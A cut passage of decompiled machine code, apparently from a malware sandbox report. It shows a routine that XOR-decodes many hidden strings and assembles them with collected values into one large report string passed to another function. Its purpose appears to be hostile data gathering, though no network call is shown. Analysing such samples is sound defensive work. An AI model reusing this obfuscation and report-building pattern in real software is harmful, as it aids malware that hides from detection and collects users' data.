																																									if(_t926 >  *((intOrPtr*)(_t1890 + 4))) {
																																										E0086DB91(_t926, 0x8b52d0);
																																										_t2165 =  *0x8b52d0 - 0xffffffff;
																																										if( *0x8b52d0 == 0xffffffff) {
																																											 *0x8b5474 =  *((intOrPtr*)(_t1959 - 0x18));
																																											 *0x8b5478 =  *((intOrPtr*)(_t1959 - 0x14));
																																											L0086DFE8( *((intOrPtr*)(_t1959 - 0x14)), _t2165, 0x895ff3);
																																											L0086DB47(0x8b52d0);
																																										}
																																									}
																																									if( *0x8b547b == 0) {
																																										L220:
																																										_t927 =  *0x8b4f84; // 0x80000095
																																										 *((intOrPtr*)(_t1959 - 0x20)) = 0x5a5d577d;
																																										 *((intOrPtr*)(_t1959 - 0x1c)) = 0x460e434b;
																																										 *((intOrPtr*)(_t1959 - 0x18)) = 0x14465d4f;
																																										 *((short*)(_t1959 - 0x14)) = 0x2e0e;
																																										if(_t927 >  *((intOrPtr*)(_t1890 + 4))) {
																																											E0086DB91(_t927, 0x8b4f84);
																																											_t2170 =  *0x8b4f84 - 0xffffffff;
																																											_pop(_t1699);
																																											if( *0x8b4f84 == 0xffffffff) {
																																												asm("movsd");
																																												asm("movsd");
																																												asm("movsd");
																																												asm("movsw");
																																												L0086DFE8(_t1699, _t2170, 0x896002);
																																												 *_t1963 = 0x8b4f84;
																																												L0086DB47();
																																												_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																											}
																																										}
																																										if( *0x8b4d59 == 0) {
																																											L226:
																																											_t929 = E0082E9EC(_t1312, _t1959 - 0xb14, 0x8b4d4c);
																																											_t1926 = "\n";
																																											 *((char*)(_t1959 - 4)) = 0x1d;
																																											_t930 = E0082E917(_t1959 - 0xafc, _t929, _t2173, "\n");
																																											 *((char*)(_t1959 - 4)) = 0x1e;
																																											_t931 = E0082E917(_t1959 - 0xae4, _t930, _t2173, 0x8b5474);
																																											 *((char*)(_t1959 - 4)) = 0x1f;
																																											E0082FA3B(_t1959 - 0x1fc,  *((intOrPtr*)(_t1959 - 0x30)), _t931, _t1959 - 0x13c, _t1959 - 0x22c);
																																											 *((char*)(_t1959 - 4)) = 0x20;
																																											_t933 = E0082E917(_t1959 - 0xacc, _t1959 - 0x1fc, _t2173, "\n");
																																											 *((char*)(_t1959 - 4)) = 0x21;
																																											_t934 = E0082E917(_t1959 - 0xab4, _t933, _t2173, 0x8b5ab0);
																																											 *((char*)(_t1959 - 4)) = 0x22;
																																											_t935 = E0082E981(_t1959 - 0xa9c, _t934, 0x8b29e4);
																																											 *((char*)(_t1959 - 4)) = 0x23;
																																											_t936 = E0082E917(_t1959 - 0xa84, _t935, _t2173, "\n");
																																											 *((char*)(_t1959 - 4)) = 0x24;
																																											_t937 = E0082E917(_t1959 - 0xa6c, _t936, _t2173, 0x8b5ed0);
																																											 *((char*)(_t1959 - 4)) = 0x25;
																																											_t938 = E0082E917(_t1959 - 0xa54, _t937, _t2173, "xuinya");
																																											 *((char*)(_t1959 - 4)) = 0x26;
																																											_t939 = E0082E917(_t1959 - 0xa3c, _t938, _t2173, "\n");
																																											 *((char*)(_t1959 - 4)) = 0x27;
																																											_t940 = E0082E917(_t1959 - 0xa24, _t939, _t2173, _t1312);
																																											 *((char*)(_t1959 - 4)) = 0x28;
																																											_t941 = E0082E917(_t1959 - 0xa0c, _t940, _t2173, 0x8b5000);
																																											 *((char*)(_t1959 - 4)) = 0x29;
																																											_t942 = E0082E981(_t1959 - 0x9f4, _t941, 0x8b29e4);
																																											 *((char*)(_t1959 - 4)) = 0x2a;
																																											_t943 = E0082E917(_t1959 - 0x9dc, _t942, _t2173, 0x8b52f0);
																																											 *((char*)(_t1959 - 4)) = 0x2b;
																																											_t944 = E0082E917(_t1959 - 0x9c4, _t943, _t2173,  *((intOrPtr*)(_t1959 - 0x68)));
																																											 *((char*)(_t1959 - 4)) = 0x2c;
																																											_t945 = E0082E917(_t1959 - 0x9ac, _t944, _t2173, 0x8b4eec);
																																											 *((char*)(_t1959 - 4)) = 0x2d;
																																											E0082FA3B(_t1959 - 0x1e4);
																																											 *((char*)(_t1959 - 4)) = 0x2e;
																																											_t947 = E0082E917(_t1959 - 0x994, _t1959 - 0x1e4, _t2173, " (");
																																											 *((char*)(_t1959 - 4)) = 0x2f;
																																											E0082FA3B(_t1959 - 0x1cc,  *((intOrPtr*)(_t1959 - 0x30)), _t947,  *((intOrPtr*)(_t1959 - 0x60)),  *((intOrPtr*)(_t1959 - 0x30)));
																																											 *((char*)(_t1959 - 4)) = 0x30;
																																											_t949 = E0082E917(_t1959 - 0x97c, _t1959 - 0x1cc, _t2173, ")\n\n");
																																											 *((char*)(_t1959 - 4)) = 0x31;
																																											_t950 = E0082E917(_t1959 - 0x964, _t949, _t2173, 0x8b4b40);
																																											 *((char*)(_t1959 - 4)) = 0x32;
																																											E0082FA3B(_t1959 - 0x1b4,  *((intOrPtr*)(_t1959 - 0x30)), _t950,  *((intOrPtr*)(_t1959 - 0x5c)), _t945);
																																											 *((char*)(_t1959 - 4)) = 0x33;
																																											_t952 = E0082E917(_t1959 - 0x94c, _t1959 - 0x1b4, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x34;
																																											_t953 = E0082E917(_t1959 - 0x934, _t952, _t2173, 0x8b524c);
																																											 *((char*)(_t1959 - 4)) = 0x35;
																																											E0082FA3B(_t1959 - 0x19c,  *((intOrPtr*)(_t1959 - 0x30)), _t953,  *((intOrPtr*)(_t1959 - 0xb4)),  *(_t1959 - 0x64));
																																											 *((char*)(_t1959 - 4)) = 0x36;
																																											_t955 = E0082E917(_t1959 - 0x91c, _t1959 - 0x19c, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x37;
																																											_t956 = E0082E917(_t1959 - 0x904, _t955, _t2173, 0x8b5f88);
																																											 *((char*)(_t1959 - 4)) = 0x38;
																																											E0082FA3B(_t1959 - 0x184);
																																											 *((char*)(_t1959 - 4)) = 0x39;
																																											_t958 = E0082E917(_t1959 - 0x8ec, _t1959 - 0x184, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x3a;
																																											_t959 = E0082E917(_t1959 - 0x8d4, _t958, _t2173, 0x8b59c0);
																																											 *((char*)(_t1959 - 4)) = 0x3b;
																																											E0082FA3B(_t1959 - 0x16c,  *((intOrPtr*)(_t1959 - 0x30)), _t959,  *((intOrPtr*)(_t1959 - 0xcc)),  *((intOrPtr*)(_t1959 - 0x30)));
																																											 *((char*)(_t1959 - 4)) = 0x3c;
																																											_t961 = E0082E917(_t1959 - 0x8bc, _t1959 - 0x16c, _t2173, "\n\n");
																																											 *((char*)(_t1959 - 4)) = 0x3d;
																																											_t962 = E0082E917(_t1959 - 0x8a4, _t961, _t2173, 0x8b5e4c);
																																											 *((char*)(_t1959 - 4)) = 0x3e;
																																											_t963 = E0082E917(_t1959 - 0x88c, _t962, _t2173,  *((intOrPtr*)(_t1959 - 0xd0)));
																																											 *((char*)(_t1959 - 4)) = 0x3f;
																																											_t964 = E0082E917(_t1959 - 0x874, _t963, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x40;
																																											_t965 = E0082E917(_t1959 - 0x85c, _t964, _t2173, 0x8b5c24);
																																											 *((char*)(_t1959 - 4)) = 0x41;
																																											_t966 = E0082E917(_t1959 - 0x844, _t965, _t2173,  *((intOrPtr*)(_t1959 - 0xd4)));
																																											 *((char*)(_t1959 - 4)) = 0x42;
																																											_t967 = E0082E917(_t1959 - 0x82c, _t966, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x43;
																																											_t968 = E0082E917(_t1959 - 0x814, _t967, _t2173, 0x8b549c);
																																											 *((char*)(_t1959 - 4)) = 0x44;
																																											_t969 = E0082E917(_t1959 - 0x7fc, _t968, _t2173,  *((intOrPtr*)(_t1959 - 0x88)));
																																											 *((char*)(_t1959 - 4)) = 0x45;
																																											_t970 = E0082E917(_t1959 - 0x7e4, _t969, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x46;
																																											_t971 = E0082E917(_t1959 - 0x7cc, _t970, _t2173, 0x8b6224);
																																											 *((char*)(_t1959 - 4)) = 0x47;
																																											_t972 = E0082E917(_t1959 - 0x7b4, _t971, _t2173,  *((intOrPtr*)(_t1959 - 0x8c)));
																																											 *((char*)(_t1959 - 4)) = 0x48;
																																											_t973 = E0082E917(_t1959 - 0x79c, _t972, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x49;
																																											_t974 = E0082E917(_t1959 - 0x784, _t973, _t2173, 0x8b5b88);
																																											 *((char*)(_t1959 - 4)) = 0x4a;
																																											_t975 = E0082E917(_t1959 - 0x76c, _t974, _t2173,  *((intOrPtr*)(_t1959 - 0x90)));
																																											 *((char*)(_t1959 - 4)) = 0x4b;
																																											_t976 = E0082E917(_t1959 - 0x754, _t975, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x4c;
																																											_t977 = E0082E917(_t1959 - 0x73c, _t976, _t2173, 0x8b523c);
																																											 *((char*)(_t1959 - 4)) = 0x4d;
																																											_t978 = E0082E917(_t1959 - 0x724, _t977, _t2173,  *((intOrPtr*)(_t1959 - 0x94)));
																																											 *((char*)(_t1959 - 4)) = 0x4e;
																																											_t979 = E0082E917(_t1959 - 0x70c, _t978, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x4f;
																																											_t980 = E0082E917(_t1959 - 0x6f4, _t979, _t2173, 0x8b5e38);
																																											 *((char*)(_t1959 - 4)) = 0x50;
																																											_t981 = E0082E917(_t1959 - 0x6dc, _t980, _t2173,  *((intOrPtr*)(_t1959 - 0x3c)));
																																											 *((char*)(_t1959 - 4)) = 0x51;
																																											_t982 = E0082E917(_t1959 - 0x6c4, _t981, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x52;
																																											_t983 = E0082E917(_t1959 - 0x6ac, _t982, _t2173, 0x8b5d00);
																																											 *((char*)(_t1959 - 4)) = 0x53;
																																											_t984 = E0082E917(_t1959 - 0x694, _t983, _t2173,  *((intOrPtr*)(_t1959 - 0x98)));
																																											 *((char*)(_t1959 - 4)) = 0x54;
																																											_t985 = E0082E917(_t1959 - 0x67c, _t984, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x55;
																																											_t986 = E0082E917(_t1959 - 0x664, _t985, _t2173, 0x8b5f34);
																																											 *((char*)(_t1959 - 4)) = 0x56;
																																											_t987 = E0082E917(_t1959 - 0x64c, _t986, _t2173,  *((intOrPtr*)(_t1959 - 0x9c)));
																																											 *((char*)(_t1959 - 4)) = 0x57;
																																											_t988 = E0082E917(_t1959 - 0x634, _t987, _t2173, "\n\n");
																																											 *((char*)(_t1959 - 4)) = 0x58;
																																											_t989 = E0082E917(_t1959 - 0x61c, _t988, _t2173, 0x8b5b94);
																																											 *((char*)(_t1959 - 4)) = 0x59;
																																											_t990 = E0082E917(_t1959 - 0x604, _t989, _t2173,  *((intOrPtr*)(_t1959 - 0x4c)));
																																											 *((char*)(_t1959 - 4)) = 0x5a;
																																											_t991 = E0082E917(_t1959 - 0x5ec, _t990, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x5b;
																																											_t992 = E0082E917(_t1959 - 0x5d4, _t991, _t2173, 0x8b61c8);
																																											 *((char*)(_t1959 - 4)) = 0x5c;
																																											E0082FA3B(_t1959 - 0xf4,  *((intOrPtr*)(_t1959 - 0x30)), _t992,  *((intOrPtr*)(_t1959 - 0xb0)), _t956);
																																											 *((char*)(_t1959 - 4)) = 0x5d;
																																											_t994 = E0082E917(_t1959 - 0x5bc, _t1959 - 0xf4, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x5e;
																																											_t995 = E0082E917(_t1959 - 0x5a4, _t994, _t2173, 0x8b4de8);
																																											 *((char*)(_t1959 - 4)) = 0x5f;
																																											_t996 = E0082E917(_t1959 - 0x58c, _t995, _t2173,  *((intOrPtr*)(_t1959 - 0xa0)));
																																											 *((char*)(_t1959 - 4)) = 0x60;
																																											_t997 = E0082E917(_t1959 - 0x574, _t996, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x61;
																																											_t998 = E0082E917(_t1959 - 0x55c, _t997, _t2173, 0x8b5e08);
																																											 *((char*)(_t1959 - 4)) = 0x62;
																																											_t999 = E0082E917(_t1959 - 0x544, _t998, _t2173,  *((intOrPtr*)(_t1959 - 0xa4)));
																																											 *((char*)(_t1959 - 4)) = 0x63;
																																											_t1000 = E0082E917(_t1959 - 0x52c, _t999, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x64;
																																											_t1001 = E0082E917(_t1959 - 0x514, _t1000, _t2173, 0x8b5e84);
																																											 *((char*)(_t1959 - 4)) = 0x65;
																																											_t1002 = E0082E917(_t1959 - 0x4fc, _t1001, _t2173,  *((intOrPtr*)(_t1959 - 0xa8)));
																																											 *((char*)(_t1959 - 4)) = 0x66;
																																											_t1003 = E0082E917(_t1959 - 0x4e4, _t1002, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x67;
																																											_t1004 = E0082E917(_t1959 - 0x4cc, _t1003, _t2173, 0x8b56a0);
																																											 *((char*)(_t1959 - 4)) = 0x68;
																																											_t1005 = E0082E917(_t1959 - 0x4b4, _t1004, _t2173,  *((intOrPtr*)(_t1959 - 0x38)));
																																											 *((char*)(_t1959 - 4)) = 0x69;
																																											_t1006 = E0082E917(_t1959 - 0x49c, _t1005, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x6a;
																																											_t1007 = E0082E917(_t1959 - 0x484, _t1006, _t2173, 0x8b5ce8);
																																											 *((char*)(_t1959 - 4)) = 0x6b;
																																											_t1008 = E0082E917(_t1959 - 0x46c, _t1007, _t2173,  *((intOrPtr*)(_t1959 - 0xac)));
																																											 *((char*)(_t1959 - 4)) = 0x6c;
																																											_t1009 = E0082E917(_t1959 - 0x454, _t1008, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x6d;
																																											_t1010 = E0082E917(_t1959 - 0x43c, _t1009, _t2173, 0x8b4cb8);
																																											 *((char*)(_t1959 - 4)) = 0x6e;
																																											_t1011 = E0082E917(_t1959 - 0x424, _t1010, _t2173,  *((intOrPtr*)(_t1959 - 0xc8)));
																																											 *((char*)(_t1959 - 4)) = 0x6f;
																																											_t1012 = E0082E917(_t1959 - 0x40c, _t1011, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x70;
																																											_t1013 = E0082E917(_t1959 - 0x3f4, _t1012, _t2173, 0x8b5114);
																																											 *((char*)(_t1959 - 4)) = 0x71;
																																											_t1014 = E0082E917(_t1959 - 0x3dc, _t1013, _t2173,  *((intOrPtr*)(_t1959 - 0x54)));
																																											 *((char*)(_t1959 - 4)) = 0x72;
																																											_t1015 = E0082E917(_t1959 - 0x3c4, _t1014, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x73;
																																											_t1016 = E0082E917(_t1959 - 0x3ac, _t1015, _t2173, 0x8b4be0);
																																											 *((char*)(_t1959 - 4)) = 0x74;
																																											_t1017 = E0082E917(_t1959 - 0x394, _t1016, _t2173,  *((intOrPtr*)(_t1959 - 0xb8)));
																																											 *((char*)(_t1959 - 4)) = 0x75;
																																											_t1018 = E0082E917(_t1959 - 0x37c, _t1017, _t2173, "\n\n");
																																											 *((char*)(_t1959 - 4)) = 0x76;
																																											_t1019 = E0082E917(_t1959 - 0x364, _t1018, _t2173,  *((intOrPtr*)(_t1959 - 0xbc)));
																																											 *((char*)(_t1959 - 4)) = 0x77;
																																											_t1020 = E0082E917(_t1959 - 0x34c, _t1019, _t2173,  *((intOrPtr*)(_t1959 - 0xc0)));
																																											 *((char*)(_t1959 - 4)) = 0x78;
																																											_t1021 = E0082E917(_t1959 - 0x334, _t1020, _t2173, _t1959 - 0xd2c);
																																											 *((char*)(_t1959 - 4)) = 0x79;
																																											_t1022 = E0082E917(_t1959 - 0x31c, _t1021, _t2173, _t1926);
																																											 *((char*)(_t1959 - 4)) = 0x7a;
																																											_t1023 = E0082E917(_t1959 - 0x304, _t1022, _t2173, 0x8b5274);
																																											 *((char*)(_t1959 - 4)) = 0x7b;
																																											_t1024 = E0082E917(_t1959 - 0x2ec, _t1023, _t2173,  *((intOrPtr*)(_t1959 - 0xc4)));
																																											 *((char*)(_t1959 - 4)) = 0x7c;
																																											_t1025 = E0082E917(_t1959 - 0x2d4, _t1024, _t2173, 0x8a43ab);
																																											 *((char*)(_t1959 - 4)) = 0x7d;
																																											_t1026 = E0082E917(_t1959 - 0x2bc, _t1025, _t2173,  *((intOrPtr*)(_t1959 - 0x6c)));
																																											 *((char*)(_t1959 - 4)) = 0x7e;
																																											E0082FA3B(_t1959 - 0x10c,  *((intOrPtr*)(_t1959 - 0x30)), _t1026, _t1959 - 0x154,  *((intOrPtr*)(_t1959 - 0x44)));
																																											 *((char*)(_t1959 - 4)) = 0x7f;
																																											_t1028 = E0082E917(_t1959 - 0x2a4, _t1959 - 0x10c, _t2173, " sec.\n");
																																											 *((char*)(_t1959 - 4)) = 0x80;
																																											E0082E917(_t1959 - 0x214, _t1028, _t2173,  *((intOrPtr*)(_t1959 - 0x30)));
																																											E0082DF41(_t1959 - 0x2a4);
																																											E0082DF41(_t1959 - 0x10c);
																																											E0082DF41(_t1959 - 0x2bc);
																																											E0082DF41(_t1959 - 0x2d4);
																																											E0082DF41(_t1959 - 0x2ec);
																																											E0082DF41(_t1959 - 0x304);
																																											E0082DF41(_t1959 - 0x31c);
																																											E0082DF41(_t1959 - 0x334);
																																											E0082DF41(_t1959 - 0x34c);
																																											E0082DF41(_t1959 - 0x364);
																																											E0082DF41(_t1959 - 0x37c);
																																											E0082DF41(_t1959 - 0x394);
																																											E0082DF41(_t1959 - 0x3ac);
																																											E0082DF41(_t1959 - 0x3c4);
																																											E0082DF41(_t1959 - 0x3dc);
																																											E0082DF41(_t1959 - 0x3f4);
																																											E0082DF41(_t1959 - 0x40c);
																																											E0082DF41(_t1959 - 0x424);
																																											E0082DF41(_t1959 - 0x43c);
																																											E0082DF41(_t1959 - 0x454);
																																											E0082DF41(_t1959 - 0x46c);
																																											E0082DF41(_t1959 - 0x484);
																																											E0082DF41(_t1959 - 0x49c);
																																											E0082DF41(_t1959 - 0x4b4);
																																											E0082DF41(_t1959 - 0x4cc);
																																											E0082DF41(_t1959 - 0x4e4);
																																											E0082DF41(_t1959 - 0x4fc);
																																											E0082DF41(_t1959 - 0x514);
																																											E0082DF41(_t1959 - 0x52c);
																																											E0082DF41(_t1959 - 0x544);
																																											E0082DF41(_t1959 - 0x55c);
																																											E0082DF41(_t1959 - 0x574);
																																											E0082DF41(_t1959 - 0x58c);
																																											E0082DF41(_t1959 - 0x5a4);
																																											E0082DF41(_t1959 - 0x5bc);
																																											E0082DF41(_t1959 - 0xf4);
																																											E0082DF41(_t1959 - 0x5d4);
																																											E0082DF41(_t1959 - 0x5ec);
																																											E0082DF41(_t1959 - 0x604);
																																											E0082DF41(_t1959 - 0x61c);
																																											E0082DF41(_t1959 - 0x634);
																																											E0082DF41(_t1959 - 0x64c);
																																											E0082DF41(_t1959 - 0x664);
																																											E0082DF41(_t1959 - 0x67c);
																																											E0082DF41(_t1959 - 0x694);
																																											E0082DF41(_t1959 - 0x6ac);
																																											E0082DF41(_t1959 - 0x6c4);
																																											E0082DF41(_t1959 - 0x6dc);
																																											E0082DF41(_t1959 - 0x6f4);
																																											E0082DF41(_t1959 - 0x70c);
																																											E0082DF41(_t1959 - 0x724);
																																											E0082DF41(_t1959 - 0x73c);
																																											E0082DF41(_t1959 - 0x754);
																																											E0082DF41(_t1959 - 0x76c);
																																											E0082DF41(_t1959 - 0x784);
																																											E0082DF41(_t1959 - 0x79c);
																																											E0082DF41(_t1959 - 0x7b4);
																																											E0082DF41(_t1959 - 0x7cc);
																																											E0082DF41(_t1959 - 0x7e4);
																																											E0082DF41(_t1959 - 0x7fc);
																																											E0082DF41(_t1959 - 0x814);
																																											E0082DF41(_t1959 - 0x82c);
																																											E0082DF41(_t1959 - 0x844);
																																											E0082DF41(_t1959 - 0x85c);
																																											E0082DF41(_t1959 - 0x874);
																																											E0082DF41(_t1959 - 0x88c);
																																											E0082DF41(_t1959 - 0x8a4);
																																											E0082DF41(_t1959 - 0x8bc);
																																											E0082DF41(_t1959 - 0x16c);
																																											E0082DF41(_t1959 - 0x8d4);
																																											E0082DF41(_t1959 - 0x8ec);
																																											E0082DF41(_t1959 - 0x184);
																																											E0082DF41(_t1959 - 0x904);
																																											E0082DF41(_t1959 - 0x91c);
																																											E0082DF41(_t1959 - 0x19c);
																																											E0082DF41(_t1959 - 0x934);
																																											E0082DF41(_t1959 - 0x94c);
																																											E0082DF41(_t1959 - 0x1b4);
																																											E0082DF41(_t1959 - 0x964);
																																											E0082DF41(_t1959 - 0x97c);
																																											E0082DF41(_t1959 - 0x1cc);
																																											E0082DF41(_t1959 - 0x994);
																																											E0082DF41(_t1959 - 0x1e4);
																																											E0082DF41(_t1959 - 0x9ac);
																																											E0082DF41(_t1959 - 0x9c4);
																																											E0082DF41(_t1959 - 0x9dc);
																																											E0082DF41(_t1959 - 0x9f4);
																																											E0082DF41(_t1959 - 0xa0c);
																																											E0082DF41(_t1959 - 0xa24);
																																											E0082DF41(_t1959 - 0xa3c);
																																											E0082DF41(_t1959 - 0xa54);
																																											E0082DF41(_t1959 - 0xa6c);
																																											E0082DF41(_t1959 - 0xa84);
																																											E0082DF41(_t1959 - 0xa9c);
																																											E0082DF41(_t1959 - 0xab4);
																																											E0082DF41(_t1959 - 0xacc);
																																											E0082DF41(_t1959 - 0x1fc);
																																											E0082DF41(_t1959 - 0xae4);
																																											E0082DF41(_t1959 - 0xafc);
																																											E0082DF41(_t1959 - 0xb14);
																																											E0082DF41(_t1959 - 0x13c);
																																											E0082DF41(_t1959 - 0xb2c);
																																											E0082DF41(_t1959 - 0xb44);
																																											E0082DF41(_t1959 - 0xb5c);
																																											E0082DF41(_t1959 - 0xb74);
																																											E0082DF41(_t1959 - 0xb8c);
																																											E0082DF41(_t1959 - 0xba4);
																																											E0082DF41(_t1959 - 0xbbc);
																																											 *((char*)(_t1959 - 4)) = 0xee;
																																											E0082DF41(_t1959 - 0x154);
																																											_t1964 = _t1963 - 0x18;
																																											_t1687 = _t1964;
																																											 *((intOrPtr*)(_t1959 - 0x30)) = _t1964;
																																											 *((intOrPtr*)(_t1687 + 0x10)) = 0;
																																											 *((intOrPtr*)(_t1687 + 0x14)) = 0;
																																											E0082E0AB(_t1687, _t1959 - 0x214);
																																											 *((char*)(_t1959 - 4)) = 0xef;
																																											_t1688 = _t1964 - 0x18;
																																											 *((intOrPtr*)(_t1688 + 0x10)) = 0;
																																											 *((intOrPtr*)(_t1688 + 0x14)) = 0;
																																											E0082E0AB(_t1688, _t1959 - 0x124);
																																											 *((char*)(_t1959 - 4)) = 0xee;
																																											E00818DC6(_t1028); // executed
																																											asm("movaps xmm0, [0x8a8cd0]");
																																											_t1144 =  *0x8b561c; // 0x80000096
																																											asm("movups [ebp-0x20], xmm0");
																																											_t1928 =  >=  ?  *((void*)(_t1959 - 0x124)) : _t1959 - 0x124;
																																											if(_t1144 >  *((intOrPtr*)(_t1890 + 4))) {
																																												E0086DB91(_t1144, 0x8b561c);
																																												_t2176 =  *0x8b561c - 0xffffffff;
																																												if( *0x8b561c == 0xffffffff) {
																																													E0082D327(0x8b4e68, _t1959 - 0x20);
																																													L0086DFE8(0x8b4e68, _t2176, 0x895dde);
																																													L0086DB47(0x8b561c);
																																												}
																																											}
																																											_t1145 = E0082D30D(0x8b4e68);
																																											_push(0x8b4e68);
																																											_push(0x8b4e68);
																																											_t1690 =  *0x8b4804; // 0x1346140
																																											E008183DF(_t1690, _t1145, _t1928); // executed
																																											E0082DF41(_t1959 - 0x214);
																																											E0082DF41(_t1959 - 0x124);
																																											_t1149 = E0082DF41(_t1959 - 0x22c);
																																											 *[fs:0x0] =  *((intOrPtr*)(_t1959 - 0xc));
																																											return _t1149;
																																										} else {
																																											_t1155 = 0;
																																											do {
																																												 *(_t1155 + 0x8b4d4c) =  *(_t1155 + 0x8b4d4c) ^ 0x0000002e;
																																												_t1155 = _t1155 + 1;
																																												_t2173 = _t1155 - 0xe;
																																											} while (_t1155 < 0xe);
																																											goto L226;
																																										}
																																									} else {
																																										_t1159 = 0;
																																										do {
																																											 *(_t1159 + 0x8b5474) =  *(_t1159 + 0x8b5474) ^ 0x0000002e;
																																											_t1159 = _t1159 + 1;
																																										} while (_t1159 < 8);
																																										goto L220;
																																									}
																																								} else {
																																									_t1164 = 0;
																																									do {
																																										 *(_t1164 + 0x8b5ab0) =  *(_t1164 + 0x8b5ab0) ^ 0x0000002e;
																																										_t1164 = _t1164 + 1;
																																									} while (_t1164 < 0xa);
																																									goto L214;
																																								}
																																							} else {
																																								_t1168 = 0;
																																								do {
																																									 *(_t1168 + 0x8b5ed0) =  *(_t1168 + 0x8b5ed0) ^ 0x0000002e;
																																									_t1168 = _t1168 + 1;
																																								} while (_t1168 < 0xd);
																																								goto L208;
																																							}
																																						}
																																						_t1709 = 0;
																																						do {
																																							 *(_t1709 + _t1312) =  *(_t1709 + _t1312) ^ 0x0000002e;
																																							_t1709 = _t1709 + 1;
																																						} while (_t1709 < 0x36);
																																						goto L202;
																																					} else {
																																						_t1172 = 0;
																																						do {
																																							 *(_t1172 + 0x8b5000) =  *(_t1172 + 0x8b5000) ^ 0x0000002e;
																																							_t1172 = _t1172 + 1;
																																						} while (_t1172 < 0xe);
																																						goto L199;
																																					}
																																				} else {
																																					_t1176 = 0;
																																					do {
																																						 *(_t1176 + 0x8b52f0) =  *(_t1176 + 0x8b52f0) ^ 0x0000002e;
																																						_t1176 = _t1176 + 1;
																																					} while (_t1176 < 0x15);
																																					goto L193;
																																				}
																																			}
																																			_t1716 = 0;
																																			do {
																																				 *(_t1716 + _t918) =  *(_t1716 + _t918) ^ 0x0000002e;
																																				_t1716 = _t1716 + 1;
																																			} while (_t1716 < 0x37);
																																			goto L187;
																																		} else {
																																			_t1182 = 0;
																																			do {
																																				 *(_t1182 + 0x8b4eec) =  *(_t1182 + 0x8b4eec) ^ 0x0000002e;
																																				_t1182 = _t1182 + 1;
																																			} while (_t1182 < 9);
																																			goto L184;
																																		}
																																	} else {
																																		_t1186 = 0;
																																		do {
																																			 *(_t1186 + 0x8b4b40) =  *(_t1186 + 0x8b4b40) ^ 0x0000002e;
																																			_t1186 = _t1186 + 1;
																																		} while (_t1186 < 0xb);
																																		goto L178;
																																	}
																																} else {
																																	_t1190 = 0;
																																	do {
																																		 *(_t1190 + 0x8b524c) =  *(_t1190 + 0x8b524c) ^ 0x0000002e;
																																		_t1190 = _t1190 + 1;
																																	} while (_t1190 < 0xc);
																																	goto L172;
																																}
																															} else {
																																_t1194 = 0;
																																do {
																																	 *(_t1194 + 0x8b5f88) =  *(_t1194 + 0x8b5f88) ^ 0x0000002e;
																																	_t1194 = _t1194 + 1;
																																} while (_t1194 < 0xa);
																																goto L166;
																															}
																														} else {
																															_t1198 = 0;
																															do {
																																 *(_t1198 + 0x8b59c0) =  *(_t1198 + 0x8b59c0) ^ 0x0000002e;
																																_t1198 = _t1198 + 1;
																															} while (_t1198 < 8);
																															goto L160;
																														}
																													} else {
																														_t1203 = 0;
																														do {
																															 *(_t1203 + 0x8b5e4c) =  *(_t1203 + 0x8b5e4c) ^ 0x0000002e;
																															_t1203 = _t1203 + 1;
																														} while (_t1203 < 9);
																														goto L154;
																													}
																												} else {
																													_t1207 = 0;
																													do {
																														 *(_t1207 + 0x8b5c24) =  *(_t1207 + 0x8b5c24) ^ 0x0000002e;
																														_t1207 = _t1207 + 1;
																													} while (_t1207 < 9);
																													goto L148;
																												}
																											} else {
																												_t1211 = 0;
																												do {
																													 *(_t1211 + 0x8b549c) =  *(_t1211 + 0x8b549c) ^ 0x0000002e;
																													_t1211 = _t1211 + 1;
																												} while (_t1211 < 0xb);
																												goto L142;
																											}
																										} else {
																											_t1215 = 0;
																											do {
																												 *(_t1215 + 0x8b6224) =  *(_t1215 + 0x8b6224) ^ 0x0000002e;
																												_t1215 = _t1215 + 1;
																											} while (_t1215 < 0xe);
																											goto L136;
																										}
																									} else {
																										_t1219 = 0;
																										do {
																											 *(_t1219 + 0x8b5b88) =  *(_t1219 + 0x8b5b88) ^ 0x0000002e;
																											_t1219 = _t1219 + 1;
																										} while (_t1219 < 0xb);
																										goto L130;
																									}
																								} else {
																									_t1223 = 0;
																									do {
																										 *(_t1223 + 0x8b523c) =  *(_t1223 + 0x8b523c) ^ 0x0000002e;
																										_t1223 = _t1223 + 1;
																									} while (_t1223 < 0xb);
																									goto L124;
																								}
																							} else {
																								_t1227 = 0;
																								do {
																									 *(_t1227 + 0x8b5e38) =  *(_t1227 + 0x8b5e38) ^ 0x0000002e;
																									_t1227 = _t1227 + 1;
																								} while (_t1227 < 0xb);
																								goto L118;
																							}
																						} else {
																							_t1231 = 0;
																							do {
																								 *(_t1231 + 0x8b5d00) =  *(_t1231 + 0x8b5d00) ^ 0x0000002e;
																								_t1231 = _t1231 + 1;
																							} while (_t1231 < 8);
																							goto L112;
																						}
																					} else {
																						_t1236 = 0;
																						do {
																							 *(_t1236 + 0x8b5f34) =  *(_t1236 + 0x8b5f34) ^ 0x0000002e;
																							_t1236 = _t1236 + 1;
																						} while (_t1236 < 0xb);
																						goto L105;
																					}
																				} else {
																					_t1240 = 0;
																					do {
																						 *(_t1240 + 0x8b5b94) =  *(_t1240 + 0x8b5b94) ^ 0x0000002e;
																						_t1240 = _t1240 + 1;
																					} while (_t1240 < 0xe);
																					goto L99;
																				}
																			} else {
